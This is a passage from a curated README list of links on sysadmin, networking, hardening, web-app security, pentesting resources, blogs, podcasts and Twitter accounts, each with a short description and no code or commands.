✅ <a href="https://github.com/trimstray/nginx-admins-handbook"><b>Nginx Admin's Handbook</b></a> - how to improve NGINX performance, security and other important things.<br>
✅ <a href="https://github.com/digitalocean/nginxconfig.io"><b>nginxconfig.io</b></a> - NGINX config generator on steroids.<br>
✅ <a href="https://infosec.mozilla.org/guidelines/openssh"><b>openssh guideline</b></a> - is to help operational teams with the configuration of OpenSSH server and client.<br>
✅ <a href="https://gravitational.com/blog/ssh-handshake-explained/"><b>SSH Handshake Explained</b></a> - is a relatively brief description of the SSH handshake.<br>
✅ <a href="https://kb.isc.org/docs/using-this-knowledgebase"><b>ISC's Knowledgebase</b></a> - you'll find some general information about BIND 9, ISC DHCP, and Kea DHCP.<br>
✅ <a href="https://packetlife.net/"><b>PacketLife.net</b></a> - a place to record notes while studying for Cisco's CCNP certification.<br>
</p>
##### :black_small_square: Microsoft
<p>
✅ <a href="https://github.com/infosecn1nja/AD-Attack-Defense"><b>AD-Attack-Defense</b></a> - attack and defend active directory using modern post exploitation activity.<br>
</p>
##### :black_small_square: Large-scale systems
<p>
✅ <a href="https://github.com/donnemartin/system-design-primer"><b>The System Design Primer</b></a> - learn how to design large-scale systems.<br>
✅ <a href="https://github.com/binhnguyennus/awesome-scalability"><b>Awesome Scalability</b></a> - best practices in building High Scalability, High Availability, High Stability, and more.<br>
✅ <a href="https://engineering.videoblocks.com/web-architecture-101-a3224e126947?gi=a896808d22a"><b>Web Architecture 101</b></a> - the basic architecture concepts.<br>
</p>
##### :black_small_square: System hardening
<p>
✅ <a href="https://www.cisecurity.org/cis-benchmarks/"><b>CIS Benchmarks</b></a> - secure configuration settings for over 100 technologies, available as a free PDF.<br>
✅ <a href="https://highon.coffee/blog/security-harden-centos-7/"><b>Security Harden CentOS 7</b></a> - this walks you through the steps required to security harden CentOS.<br>
✅ <a href="https://www.lisenet.com/2017/centos-7-server-hardening-guide/"><b>CentOS 7 Server Hardening Guide</b></a> - great guide for hardening CentOS; familiar with OpenSCAP.<br>
✅ <a href="https://github.com/decalage2/awesome-security-hardening"><b>awesome-security-hardening</b></a> - is a collection of security hardening guides, tools and other resources.<br>
✅ <a href="https://github.com/trimstray/the-practical-linux-hardening-guide"><b>The Practical Linux Hardening Guide</b></a> - provides a high-level overview of hardening GNU/Linux systems.<br>
✅ <a href="https://madaidans-insecurities.github.io/guides/linux-hardening.html"><b>Linux Hardening Guide</b></a> - how to harden Linux as much as possible for security and privacy.<br>
</p>
##### :black_small_square: Security & Privacy
<p>
✅ <a href="https://www.hackingarticles.in/"><b>Hacking Articles</b></a> - LRaj Chandel's Security & Hacking Blog.<br>
✅ <a href="https://github.com/toniblyx/my-arsenal-of-aws-security-tools"><b>AWS security tools</b></a> - make your AWS cloud environment more secure.<br>
✅ <a href="https://inventory.rawsec.ml/index.html"><b>Rawsec's CyberSecurity Inventory</b></a> - an inventory of tools and resources about CyberSecurity.<br>
✅ <a href="https://tls.ulfheim.net/"><b>The Illustrated TLS Connection</b></a> - every byte of a TLS connection explained and reproduced.<br>
✅ <a href="https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices"><b>SSL Research</b></a> - SSL and TLS Deployment Best Practices by SSL Labs.<br>
✅ <a href="http://selinuxgame.org/index.html"><b>SELinux Game</b></a> - learn SELinux by doing. Solve Puzzles, show skillz.<br>
✅ <a href="https://smallstep.com/blog/everything-pki.html"><b>Certificates and PKI</b></a> - everything you should know about certificates and PKI but are too afraid to ask.<br>
✅ <a href="https://appsecco.com/books/subdomain-enumeration/"><b>The Art of Subdomain Enumeration</b></a> - a reference for subdomain enumeration techniques.<br>
✅ <a href="https://lifehacker.com/the-comprehensive-guide-to-quitting-google-1830001964"><b>Quitting Google</b></a> - the comprehensive guide to quitting Google.<br>
</p>
##### :black_small_square: Web Apps
<p>
✅ <a href="https://www.owasp.org/index.php/Main_Page"><b>OWASP</b></a> - worldwide not-for-profit charitable organization focused on improving the security of software.<br>
✅ <a href="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project"><b>OWASP ASVS 3.0.1</b></a> - OWASP Application Security Verification Standard Project.<br>
✅ <a href="https://github.com/Santandersecurityresearch/asvs"><b>OWASP ASVS 3.0.1 Web App</b></a> - simple web app that helps developers understand the ASVS requirements.<br>
✅ <a href="https://github.com/OWASP/ASVS/tree/master/4.0"><b>OWASP ASVS 4.0</b></a> - is a list of application security requirements or tests.<br>
✅ <a href="https://www.owasp.org/index.php/OWASP_Testing_Project"><b>OWASP Testing Guide v4</b></a> - includes a "best practice" penetration testing framework.<br>
✅ <a href="https://github.com/OWASP/DevGuide"><b>OWASP Dev Guide</b></a> - this is the development version of the OWASP Developer Guide.<br>
✅ <a href="https://github.com/OWASP/wstg"><b>OWASP WSTG</b></a> - is a comprehensive open source guide to testing the security of web apps.<br>
✅ <a href="https://www.owasp.org/index.php/OWASP_API_Security_Project"><b>OWASP API Security Project</b></a> - focuses specifically on the top ten vulnerabilities in API security.<br>
✅ <a href="https://infosec.mozilla.org/guidelines/web_security.html"><b>Mozilla Web Security</b></a> - help operational teams with creating secure web applications.<br>
✅ <a href="https://github.com/Netflix/security-bulletins"><b>security-bulletins</b></a> - security bulletins that relate to Netflix Open Source.<br>
✅ <a href="https://github.com/shieldfy/API-Security-Checklist"><b>API-Security-Checklist</b></a> - security countermeasures when designing, testing, and releasing your API.<br>
✅ <a href="https://enable-cors.org/index.html"><b>Enable CORS</b></a> - enable cross-origin resource sharing.<br>
✅ <a href="https://appsecwiki.com/#/"><b>Application Security Wiki</b></a> - is an initiative to provide all application security related resources at one place.<br>
✅ <a href="https://github.com/GrrrDog/weird_proxies/wiki"><b>Weird Proxies</b></a> - reverse proxy related attacks; it is a result of analysis of various proxies.<br>
✅ <a href="https://dfir.it/blog/2015/08/12/webshell-every-time-the-same-purpose/"><b>Webshells</b></a> - great series about malicious payloads.<br>
✅ <a href="https://portswigger.net/blog/practical-web-cache-poisoning"><b>Practical Web Cache Poisoning</b></a> - show you how to compromise websites by using esoteric web features.<br>
✅ <a href="https://github.com/bl4de/research/tree/master/hidden_directories_leaks"><b>Hidden directories and files</b></a> - as a source of sensitive information about web application.<br>
✅ <a href="https://bo0om.ru/en/"><b>Explosive blog</b></a> - great blog about cybersec and pentests.<br>
✅ <a href="https://www.netsparker.com/security-cookies-whitepaper/"><b>Security Cookies</b></a> - this paper will take a close look at cookie security.<br>
✅ <a href="https://github.com/GitGuardian/APISecurityBestPractices"><b>APISecurityBestPractices</b></a> - help you keep secrets (API keys, db credentials, certificates) out of source code.<br>
</p>
##### :black_small_square: All-in-one
<p>
✅ <a href="https://lzone.de/cheat-sheet/"><b>LZone Cheat Sheets</b></a> - all cheat sheets.<br>
✅ <a href="https://github.com/rstacruz/cheatsheets"><b>Dan’s Cheat Sheets’s</b></a> - massive cheat sheets documentation.<br>
✅ <a href="https://devhints.io/"><b>Rico's cheatsheets</b></a> - this is a modest collection of cheatsheets.<br>
✅ <a href="https://devdocs.io/"><b>DevDocs API</b></a> - combines multiple API documentations in a fast, organized, and searchable interface.<br>
✅ <a href="https://cheat.sh/"><b>cheat.sh</b></a> - the only cheat sheet you need.<br>
✅ <a href="https://gnulinux.guru/"><b>gnulinux.guru</b></a> - collection of cheat sheets about bash, vim and networking.<br>
</p>
##### :black_small_square: Ebooks
<p>
✅ <a href="https://github.com/EbookFoundation/free-programming-books"><b>free-programming-books</b></a> - list of free learning resources in many languages.<br>
</p>
##### :black_small_square: Other
<p>
✅ <a href="https://bitvijays.github.io/LFC-VulnerableMachines.html"><b>CTF Series : Vulnerable Machines</b></a> - the steps below could be followed to find vulnerabilities and exploits.<br>
✅ <a href="https://github.com/manoelt/50M_CTF_Writeup"><b>50M_CTF_Writeup</b></a> - $50 million CTF from Hackerone - writeup.<br>
✅ <a href="https://github.com/j00ru/ctf-tasks"><b>ctf-tasks</b></a> - an archive of low-level CTF challenges developed over the years.<br>
✅ <a href="https://hshrzd.wordpress.com/how-to-start/"><b>How to start RE/malware analysis?</b></a> - collection of some hints and useful links for the beginners.<br>
✅ <a href="http://www.kegel.com/c10k.html"><b>The C10K problem</b></a> - it's time for web servers to handle ten thousand clients simultaneously, don't you think?<br>
✅ <a href="https://blog.benjojo.co.uk/post/why-is-ethernet-mtu-1500"><b>How 1500 bytes became the MTU of the internet</b></a> - great story about the Maximum Transmission Unit.<br>
✅ <a href="http://poormansprofiler.org/"><b>poor man's profiler</b></a> - like dtrace's don't really provide methods to see what programs are blocking on.<br>
✅ <a href="https://nickcraver.com/blog/2017/05/22/https-on-stack-overflow/"><b>HTTPS on Stack Overflow</b></a> - this is the story of a long journey regarding the implementation of SSL.<br>
✅ <a href="https://drawings.jvns.ca/"><b>Julia's Drawings</b></a> - some drawings about programming and unix world, zines about systems & debugging tools.<br>
✅ <a href="https://github.com/corkami/collisions"><b>Hash collisions</b></a> - this great repository is focused on hash collisions exploitation.<br>
✅ <a href="https://github.com/in3rsha/sha256-animation"><b>sha256-animation</b></a> - animation of the SHA-256 hash function in your terminal.<br>
✅ <a href="https://labs.ripe.net/Members/cteusche/bgp-meets-cat"><b>BGP Meets Cat</b></a> - after 3072 hours of manipulating BGP, Job Snijders has succeeded in drawing a Nyancat.<br>
✅ <a href="https://github.com/benjojo/bgp-battleships"><b>bgp-battleships</b></a> - playing battleships over BGP.<br>
✅ <a href="https://github.com/alex/what-happens-when"><b>What happens when...</b></a> - you type google.com into your browser and press enter?<br>
✅ <a href="https://github.com/vasanthk/how-web-works"><b>how-web-works</b></a> - based on the 'What happens when...' repository.<br>
✅ <a href="https://robertheaton.com/2018/11/28/https-in-the-real-world/"><b>HTTPS in the real world</b></a> - great tutorial explain how HTTPS works in the real world.<br>
✅ <a href="https://about.gitlab.com/2018/11/14/how-we-spent-two-weeks-hunting-an-nfs-bug/"><b>Gitlab and NFS bug</b></a> - how we spent two weeks hunting an NFS bug in the Linux kernel.<br>
✅ <a href="https://about.gitlab.com/2017/02/10/postmortem-of-database-outage-of-january-31/"><b>Gitlab melts down</b></a> - postmortem on the database outage of January 31 2017 with the lessons we learned.<br>
✅ <a href="http://www.catb.org/esr/faqs/hacker-howto.html"><b>How To Become A Hacker</b></a> - if you want to be a hacker, keep reading.<br>
✅ <a href="http://ithare.com/infographics-operation-costs-in-cpu-clock-cycles/"><b>Operation Costs in CPU</b></a> - should help to estimate costs of certain operations in CPU clocks.<br>
✅ <a href="https://cstack.github.io/db_tutorial/"><b>Let's Build a Simple Database</b></a> - writing a sqlite clone from scratch in C.<br>
✅ <a href="https://djhworld.github.io/post/2019/05/21/i-dont-know-how-cpus-work-so-i-simulated-one-in-code/"><b>simple-computer</b></a> - great resource to understand how computers work under the hood.<br>
✅ <a href="https://www.troyhunt.com/working-with-154-million-records-on/"><b>The story of "Have I been pwned?"</b></a> - working with 154 million records on Azure Table Storage.<br>
✅ <a href="https://www.top500.org/"><b>TOP500 Supercomputers</b></a> - shows the 500 most powerful commercially available computer systems known to us.<br>
✅ <a href="https://www.shellntel.com/blog/2017/2/8/how-to-build-a-8-gpu-password-cracker"><b>How to build a 8 GPU password cracker</b></a> - any "black magic" or hours of frustration like desktop components do.<br>
✅ <a href="https://home.cern/science/computing"><b>CERN Data Centre</b></a> - 3D visualizations of the CERN computing environments (and more).<br>
✅ <a href="http://howfuckedismydatabase.com/"><b>How fucked is my database</b></a> - evaluate how fucked your database is with this handy website.<br>
✅ <a href="https://krisbuytaert.be/blog/linux-troubleshooting-101-2016-edition/index.html"><b>Linux Troubleshooting 101 , 2016 Edition</b></a> - everything is a DNS Problem...<br>
✅ <a href="https://open.buffer.com/5-whys-process/"><b>Five Whys</b></a> - you know what the problem is, but you cannot solve it?<br>
✅ <a href="https://gvnshtn.com/maersk-me-notpetya/"><b>Maersk, me & notPetya</b></a> - how did ransomware successfully hijack hundreds of domain controllers?<br>
✅ <a href="https://howhttps.works/"><b>howhttps.works</b></a> - how HTTPS works ...in a comic!<br>
✅ <a href="https://howdns.works/"><b>howdns.works</b></a> - a fun and colorful explanation of how DNS works.<br>
✅ <a href="https://postgresqlco.nf/en/doc/param/"><b>POSTGRESQLCO.NF</b></a> - your postgresql.conf documentation and recommendations.<br>
</p>
#### Inspiring Lists [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: SysOps/DevOps
<p>
✅ <a href="https://github.com/kahun/awesome-sysadmin"><b>Awesome Sysadmin</b></a> - amazingly awesome open source sysadmin resources.<br>
✅ <a href="https://github.com/alebcay/awesome-shell"><b>Awesome Shell</b></a> - awesome command-line frameworks, toolkits, guides and gizmos.<br>
✅ <a href="https://github.com/learnbyexample/Command-line-text-processing"><b>Command-line-text-processing</b></a> - finding text to search and replace, sorting to beautifying, and more.<br>
✅ <a href="https://github.com/caesar0301/awesome-pcaptools"><b>Awesome Pcaptools</b></a> - collection of tools developed by other researchers to process network traces.<br>
✅ <a href="https://github.com/zoidbergwill/awesome-ebpf"><b>awesome-ebpf</b></a> - a curated list of awesome projects related to eBPF.<br>
✅ <a href="https://github.com/leandromoreira/linux-network-performance-parameters"><b>Linux Network Performance</b></a> - where some of the network sysctl variables fit into the Linux/Kernel network flow.<br>
✅ <a href="https://github.com/dhamaniasad/awesome-postgres"><b>Awesome Postgres</b></a> - list of awesome PostgreSQL software, libraries, tools and resources.<br>
✅ <a href="https://github.com/enochtangg/quick-SQL-cheatsheet"><b>quick-SQL-cheatsheet</b></a> - a quick reminder of all SQL queries and examples on how to use them.<br>
✅ <a href="https://github.com/Kickball/awesome-selfhosted"><b>Awesome-Selfhosted</b></a> - list of Free Software network services and web applications which can be hosted locally.<br>
✅ <a href="https://wiki.archlinux.org/index.php/List_of_applications"><b>List of applications</b></a> - huge list of apps sorted by category, as a reference for those looking for packages.<br>
✅ <a href="https://github.com/InterviewMap/CS-Interview-Knowledge-Map"><b>CS-Interview-Knowledge-Map</b></a> - build the best interview map.<br>
✅ <a href="https://github.com/Tikam02/DevOps-Guide"><b>DevOps-Guide</b></a> - DevOps Guide from basic to advanced with Interview Questions and Notes.<br>
✅ <a href="https://issue.freebsdfoundation.org/publication/?m=33057&l=1&view=issuelistBrowser"><b>FreeBSD Journal</b></a> - it is a great list of periodical magazines about FreeBSD and other important things.<br>
✅ <a href="https://github.com/bregman-arie/devops-interview-questions"><b>devops-interview-questions</b></a> - contains interview questions on various DevOps and SRE related topics.<br></p>
##### :black_small_square: Developers
<p>
✅ <a href="https://github.com/kamranahmedse/developer-roadmap"><b>Web Developer Roadmap</b></a> - roadmaps, articles and resources to help you choose your path, learn and improve.<br>
✅ <a href="https://github.com/thedaviddias/Front-End-Checklist"><b>Front-End-Checklist</b></a> - the perfect Front-End Checklist for modern websites and meticulous developers.<br>
✅ <a href="https://github.com/thedaviddias/Front-End-Performance-Checklist"><b>Front-End-Performance-Checklist</b></a> - Front-End Performance Checklist that runs faster than the others.<br>
✅ <a href="https://rszalski.github.io/magicmethods/"><b>Python's Magic Methods</b></a> - what are magic methods? They're everything in object-oriented Python.<br>
✅ <a href="https://github.com/satwikkansal/wtfpython"><b>wtfpython</b></a> - a collection of surprising Python snippets and lesser-known features.<br>
✅ <a href="https://github.com/twhite96/js-dev-reads"><b>js-dev-reads</b></a> - a list of books and articles for the discerning web developer to read.<br>
✅ <a href="https://github.com/RomuloOliveira/commit-messages-guide"><b>Commit messages guide</b></a> - a guide to understand the importance of commit messages.<br>
</p>
##### :black_small_square: Security/Pentesting
<p>
✅ <a href="https://github.com/qazbnm456/awesome-web-security"><b>Awesome Web Security</b></a> - a curated list of Web Security materials and resources.<br>
✅ <a href="https://github.com/joe-shenouda/awesome-cyber-skills"><b>awesome-cyber-skills</b></a> - a curated list of hacking environments where you can train your cyber skills.<br>
✅ <a href="https://github.com/devsecops/awesome-devsecops"><b>awesome-devsecops</b></a> - an authoritative list of awesome devsecops tools.<br>
✅ <a href="https://github.com/jivoi/awesome-osint"><b>awesome-osint</b></a> - is a curated list of amazingly awesome OSINT.<br>
✅ <a href="https://github.com/HolyBugx/HolyTips"><b>HolyTips</b></a> - tips and tutorials on Bug Bounty Hunting and Web App Security.<br>
✅ <a href="https://github.com/hslatman/awesome-threat-intelligence"><b>awesome-threat-intelligence</b></a> - a curated list of Awesome Threat Intelligence resources.<br>
✅ <a href="https://github.com/infosecn1nja/Red-Teaming-Toolkit"><b>Red-Teaming-Toolkit</b></a> - a collection of open source and commercial tools that aid in red team operations.<br>
✅ <a href="https://github.com/snoopysecurity/awesome-burp-extensions"><b>awesome-burp-extensions</b></a> - a curated list of amazingly awesome Burp Extensions.<br>
✅ <a href="https://github.com/Hack-with-Github/Free-Security-eBooks"><b>Free Security eBooks</b></a> - list of a Free Security and Hacking eBooks.<br>
✅ <a href="https://github.com/yeahhub/Hacking-Security-Ebooks"><b>Hacking-Security-Ebooks</b></a> - top 100 Hacking & Security E-Books.<br>
✅ <a href="https://github.com/nikitavoloboev/privacy-respecting"><b>privacy-respecting</b></a> - curated list of privacy respecting services and software.<br>
✅ <a href="https://github.com/wtsxDev/reverse-engineering"><b>reverse-engineering</b></a> - list of awesome reverse engineering resources.<br>
✅ <a href="https://github.com/michalmalik/linux-re-101"><b>linux-re-101</b></a> - a collection of resources for linux reverse engineering.<br>
✅ <a href="https://github.com/onethawt/reverseengineering-reading-list"><b>reverseengineering-reading-list</b></a> - a list of Reverse Engineering articles, books, and papers.<br>
✅ <a href="https://github.com/0xInfection/Awesome-WAF"><b>Awesome-WAF</b></a> - a curated list of awesome web-app firewall (WAF) stuff.<br>
✅ <a href="https://github.com/jakejarvis/awesome-shodan-queries"><b>awesome-shodan-queries</b></a> - interesting, funny, and depressing search queries to plug into shodan.io.<br>
✅ <a href="https://github.com/danielmiessler/RobotsDisallowed"><b>RobotsDisallowed</b></a> - a curated list of the most common and most interesting robots.txt disallowed directories.<br>
✅ <a href="https://github.com/Kayzaks/HackingNeuralNetworks"><b>HackingNeuralNetworks</b></a> - is a small course on exploiting and defending neural networks.<br>
✅ <a href="https://gist.github.com/joepie91/7e5cad8c0726fd6a5e90360a754fc568"><b>wildcard-certificates</b></a> - why you probably shouldn't use a wildcard certificate.<br>
✅ <a href="https://gist.github.com/joepie91/5a9909939e6ce7d09e29"><b>Don't use VPN services</b></a> - which is what every third-party "VPN provider" does.<br>
✅ <a href="https://github.com/InQuest/awesome-yara"><b>awesome-yara</b></a> - a curated list of awesome YARA rules, tools, and people.<br>
✅ <a href="https://github.com/drduh/macOS-Security-and-Privacy-Guide"><b>macOS-Security-and-Privacy-Guide</b></a> - guide to securing and improving privacy on macOS.<br>
✅ <a href="https://github.com/usnistgov/macos_security"><b>macos_security</b></a> - macOS Security Compliance Project.<br>
✅ <a href="https://github.com/PaulSec/awesome-sec-talks"><b>awesome-sec-talks</b></a> - is a collected list of awesome security talks.<br>
✅ <a href="https://github.com/k4m4/movies-for-hackers"><b>Movies for Hackers</b></a> - list of movies every hacker & cyberpunk must watch.<br>
✅ <a href="https://github.com/danieldizzy/Cryptography_1"><b>Cryptography_1</b></a> - materials used whilst taking Prof. Dan Boneh Stanford Crypto course.<br>
✅ <a href="https://github.com/ashutosh1206/Crypton"><b>Crypton</b></a> - library to learn and practice Offensive and Defensive Cryptography.<br>
</p>
##### :black_small_square: Other
<p>
✅ <a href="https://www.cheatography.com/"><b>Cheatography</b></a> - over 3,000 free cheat sheets, revision aids and quick references.<br>
✅ <a href="https://github.com/mre/awesome-static-analysis"><b>awesome-static-analysis</b></a> - static analysis tools for all programming languages.<br>
✅ <a href="https://github.com/ossu/computer-science"><b>computer-science</b></a> - path to a free self-taught education in Computer Science.<br>
✅ <a href="https://github.com/danluu/post-mortems"><b>post-mortems</b></a> - is a collection of postmortems (config errors, hardware failures, and more).<br>
✅ <a href="https://github.com/danistefanovic/build-your-own-x"><b>build-your-own-x</b></a> - build your own (insert technology here).<br>
✅ <a href="https://github.com/rby90/Project-Based-Tutorials-in-C"><b>Project-Based-Tutorials-in-C</b></a> - is a curated list of project-based tutorials in C.<br>
✅ <a href="https://github.com/kylelobo/The-Documentation-Compendium"><b>The-Documentation-Compendium</b></a> - various README templates & tips on writing high-quality documentation.<br>
✅ <a href="https://github.com/mahmoud/awesome-python-applications"><b>awesome-python-applications</b></a> - free software that works great, and also happens to be open-source Python.<br>
✅ <a href="https://github.com/awesomedata/awesome-public-datasets"><b>awesome-public-datasets</b></a> - a topic-centric list of HQ open datasets.<br>
✅ <a href="https://github.com/Sahith02/machine-learning-algorithms"><b>machine-learning-algorithms</b></a> - a curated list of all machine learning algorithms and concepts.<br>
</p>
#### Blogs/Podcasts/Videos [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: SysOps/DevOps
<p>
✅ <a href="https://www.youtube.com/watch?v=nAFpkV5-vuI"><b>Varnish for PHP developers</b></a> - very interesting presentation of Varnish by Mattias Geniar.<br>
✅ <a href="https://www.youtube.com/watch?v=CZ3wIuvmHeM"><b>A Netflix Guide to Microservices</b></a> - talks about the chaotic and vibrant world of microservices at Netflix.<br>
</p>
##### :black_small_square: Developers
<p>
✅ <a href="https://www.youtube.com/watch?v=yOyaJXpAYZQ"><b>Comparing C to machine lang</b></a> - compare a simple C app with the compiled machine code of that program.<br>
</p>
##### :black_small_square: Geeky Persons
<p>
✅ <a href="http://www.brendangregg.com/"><b>Brendan Gregg's Blog</b></a> - is an industry expert in computing performance and cloud computing.<br>
✅ <a href="https://gynvael.coldwind.pl/"><b>Gynvael "GynDream" Coldwind</b></a> - is a IT security engineer at Google.<br>
✅ <a href="http://lcamtuf.coredump.cx/"><b>Michał "lcamtuf" Zalewski</b></a> - white hat hacker, computer security expert.<br>
✅ <a href="https://ma.ttias.be/"><b>Mattias Geniar</b></a> - developer, sysadmin, blogger, podcaster and public speaker.<br>
✅ <a href="https://nickcraver.com/"><b>Nick Craver</b></a> - software developer and systems administrator for Stack Exchange.<br>
✅ <a href="https://scotthelme.co.uk/"><b>Scott Helme</b></a> - security researcher, speaker and founder of securityheaders.com and report-uri.com.<br>
✅ <a href="https://krebsonsecurity.com/"><b>Brian Krebs</b></a> - The Washington Post and now an Independent investigative journalist.<br>
✅ <a href="https://www.schneier.com/"><b>Bruce Schneier</b></a> - is an internationally renowned security technologist, called a "security guru".<br>
✅ <a href="https://chrissymorgan.co.uk/"><b>Chrissy Morgan</b></a> - advocate of practical learning, Chrissy also takes part in bug bounty programs.<br>
✅ <a href="https://blog.zsec.uk/"><b>Andy Gill</b></a> - is a hacker at heart who works as a senior penetration tester.<br>
✅ <a href="https://danielmiessler.com/"><b>Daniel Miessler</b></a> - cybersecurity expert and writer.<br>
✅ <a href="https://samy.pl/"><b>Samy Kamkar</b></a> - is an American privacy and security researcher, computer hacker.<br>
✅ <a href="https://www.j4vv4d.com/"><b>Javvad Malik</b></a> - is a security advocate at AlienVault, a blogger event speaker and industry commentator.<br>
✅ <a href="https://www.grahamcluley.com/"><b>Graham Cluley</b></a> - public speaker and independent computer security analyst.<br>
✅ <a href="https://security.szurek.pl/"><b>Kacper Szurek</b></a> - detection engineer at ESET.<br>
✅ <a href="https://www.troyhunt.com/"><b>Troy Hunt</b></a> - web security expert known for public education and outreach on security topics.<br>
✅ <a href="https://raymii.org/s/index.html"><b>raymii.org</b></a> - sysadmin specializing in building high availability cloud environments.<br>
✅ <a href="https://robert.penz.name/"><b>Robert Penz</b></a> - IT security expert.<br>
</p>
##### :black_small_square: Geeky Blogs
<p>
✅ <a href="https://linux-audit.com/"><b>Linux Audit</b></a> - the Linux security blog about auditing, hardening and compliance by Michael Boelen.<br>
✅ <a href="https://linuxsecurity.expert/"><b>
Linux Security Expert</b></a> - trainings, howtos, checklists, security tools, and more.<br>
✅ <a href="http://www.grymoire.com/"><b>The Grymoire</b></a> - collection of useful incantations for wizards, be you computer wizards, magicians, or whatever.<br>
✅ <a href="https://www.secjuice.com"><b>Secjuice</b></a> - is the only non-profit, independent and volunteer led publication in the information security space.<br>
✅ <a href="https://duo.com/decipher"><b>Decipher</b></a> - security news that informs and inspires.<br>
</p>
##### :black_small_square: Geeky Vendor Blogs
<p>
✅ <a href="https://www.tenable.com/podcast"><b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br>
✅ <a href="https://nakedsecurity.sophos.com/"><b>Sophos</b></a> - threat news room, giving you news, opinion, advice and research on computer security issues.<br>
✅ <a href="https://www.tripwire.com/state-of-security/"><b>Tripwire State of Security</b></a> - blog featuring the latest news, trends and insights on current security issues.<br>
✅ <a href="https://blog.malwarebytes.com/"><b>Malwarebytes Labs Blog</b></a> - security blog aims to provide insider news about cybersecurity.<br>
✅ <a href="https://www.trustedsec.com/category/articles/"><b>TrustedSec</b></a> - latest news, and trends about cybersecurity.<br>
✅ <a href="https://portswigger.net/blog"><b>PortSwigger Web Security Blog</b></a> - about web app security vulns and top tips from our team of web security.<br>
✅ <a href="https://www.alienvault.com/blogs"><b>AT&T Cybersecurity blog</b></a> - news on emerging threats and practical advice to simplify threat detection.<br>
✅ <a href="https://thycotic.com/company/blog/"><b>Thycotic</b></a> - where CISOs and IT Admins come to learn about industry trends, IT security, and more.<br>
</p>
##### :black_small_square: Geeky Cybersecurity Podcasts
<p>
✅ <a href="https://risky.biz/netcasts/risky-business/"><b>Risky Business</b></a> - is a weekly information security podcast featuring news and in-depth interviews.<br>
✅ <a href="https://www.vice.com/en_us/topic/cyber"><b>Cyber, by Motherboard</b></a> - stories, and focus on the ideas about cybersecurity.<br>
✅ <a href="https://www.tenable.com/podcast"><b>Tenable Podcast</b></a> - conversations and interviews related to Cyber Exposure, and more.<br>
✅ <a href="https://podcasts.apple.com/gb/podcast/cybercrime-investigations/id1428801405"><b>
Cybercrime Investigations</b></a> - podcast by Geoff White about cybercrimes.<br>
✅ <a href="https://themanyhats.club/tag/episodes/"><b>The many hats club</b></a> - featuring stories from a wide range of Infosec people (Whitehat, Greyhat and Blackhat).<br>
✅ <a href="https://darknetdiaries.com/"><b>Darknet Diaries</b></a> - true stories from the dark side of the Internet.<br>
✅ <a href="https://www.youtube.com/playlist?list=PL423I_gHbWUXah3dmt_q_XNp0NlGAKjis"><b>OSINTCurious Webcasts</b></a> - is the investigative curiosity that helps people be successful in OSINT.<br>
✅ <a href="https://www.youtube.com/user/SecurityWeeklyTV"><b>Security Weekly</b></a> - the latest information security and hacking news.<br>
</p>
##### :black_small_square: Geeky Cybersecurity Video Blogs
<p>
✅ <a href="https://www.youtube.com/channel/UCzvJStjySZVvOBsPl-Vgj0g"><b>rev3rse security</b></a> - offensive, binary exploitation, web app security, hardening, red team, blue team.<br>
✅ <a href="https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w"><b>LiveOverflow</b></a> - a lot more advanced topics than what is typically offered in paid online courses - but for free.<br>
✅ <a href="https://www.youtube.com/infoseccynic"><b>J4vv4D</b></a> - the important information regarding our internet security.<br>
✅ <a href="https://cybertalks.co.uk/"><b>
CyberTalks</b></a> - talks, interviews, and article about cybersecurity.<br>
</p>
##### :black_small_square: Best Personal Twitter Accounts
<p>
✅ <a href="https://twitter.com/blackroomsec"><b>@blackroomsec</b></a> - a white-hat hacker/pentester. Intergalactic Minesweeper Champion 1990.<br>
✅ <a href="https://twitter.com/MarcoCiappelli"><b>@MarcoCiappelli</b></a> - Co-Founder @ITSPmagazine, at the intersection of IT security and society.<br>
✅ <a href="https://twitter.com/binitamshah"><b>@binitamshah</b></a> - Linux Evangelist. Malwares. Kernel Dev. Security Enthusiast.<br>
✅ <a href="https://twitter.com/joe_carson"><b>@joe_carson</b></a> - an InfoSec Professional and Tech Geek.<br>
✅ <a href="https://twitter.com/mikko"><b>@mikko</b></a> - CRO at F-Secure, Reverse Engineer, TED Speaker, Supervillain.<br>
✅ <a href="https://twitter.com/esrtweet"><b>@esrtweet</b></a> - often referred to as ESR, is an American software developer, and open-source software advocate.<br>
✅ <a href="https://twitter.com/gynvael"><b>@gynvael</b></a> - security researcher/programmer, @DragonSectorCTF founder/player, technical streamer.<br>
✅ <a href="https://twitter.com/x0rz"><b>@x0rz</b></a> - Security Researcher & Cyber Observer.<br>
✅ <a href="https://twitter.com/hasherezade"><b>@hasherezade</b></a> - programmer, malware analyst. Author of PEbear, PEsieve, libPeConv.<br>
✅ <a href="https://twitter.com/TinkerSec"><b>@TinkerSec</b></a> - tinkerer, cypherpunk, hacker.<br>
✅ <a href="https://twitter.com/alisaesage"><b>@alisaesage</b></a> - independent hacker and researcher.<br>
✅ <a href="https://twitter.com/SwiftOnSecurity"><b>@SwiftOnSecurity</b></a> - systems security, industrial safety, sysadmin, author of decentsecurity.com.<br>
✅ <a href="https://twitter.com/dakami"><b>@dakami</b></a> - is one of just seven people with the authority to restore the DNS root keys.<br>
✅ <a href="https://twitter.com/samykamkar"><b>@samykamkar</b></a> - is a famous "grey hat" hacker, security researcher, creator of the MySpace "Samy" worm.<br>
✅ <a href="https://twitter.com/securityweekly"><b>@securityweekly</b></a> - founder & CTO of Security Weekly podcast network.<br>
✅ <a href="https://twitter.com/jack_daniel"><b>@jack_daniel</b></a> - @SecurityBSides co-founder.<br>
✅ <a href="https://twitter.com/thegrugq"><b>@thegrugq</b></a> - Security Researcher.<br>
✅ <a href="https://twitter.com/matthew_d_green"><b>@matthew_d_green</b></a> - a cryptographer and professor at Johns Hopkins University.<br>
</p>
##### :black_small_square: Best Commercial Twitter Accounts
<p>
✅ <a href="https://twitter.com/haveibeenpwned"><b>@haveibeenpwned</b></a> - check if you have an account that has been compromised in a data breach.<br>
✅ <a href="https://twitter.com/bugcrowd"><b>@bugcrowd</b></a> - trusted by more of the Fortune 500 than any other crowdsourced security platform.<br>
